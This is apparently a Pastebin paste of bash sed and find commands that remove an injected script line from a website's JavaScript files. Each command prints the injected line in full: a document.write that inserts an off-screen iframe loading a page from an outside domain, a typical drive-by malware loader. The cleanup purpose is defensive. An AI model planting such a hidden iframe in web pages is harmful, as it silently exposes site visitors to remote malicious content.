Advertisement
Guest User

Sed antivirus

a guest
Mar 12th, 2013
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.66 KB | None | 0 0
  1. sed -i "/^;document.write('<iframe width=\"55\" height=\"55\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/zidqyetkp.ns2.name\/bf6747.xan?11\"><\/iframe>');/d" calendar.js
  2.  
  3. sed -i.bak "s#;document.write('<iframe width=\"55\" height=\"55\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/zidqyetkp.ns2.name\/bf6747.xan?11\"><\/iframe>');# #g" uploader.js
  4.  
  5. find js/ -name *.js -exec sed -i.bak "s#;document.write('<iframe width=\"55\" height=\"55\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/zidqyetkp.ns2.name\/bf6747.xan?11\"><\/iframe>');# #g" {} \;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement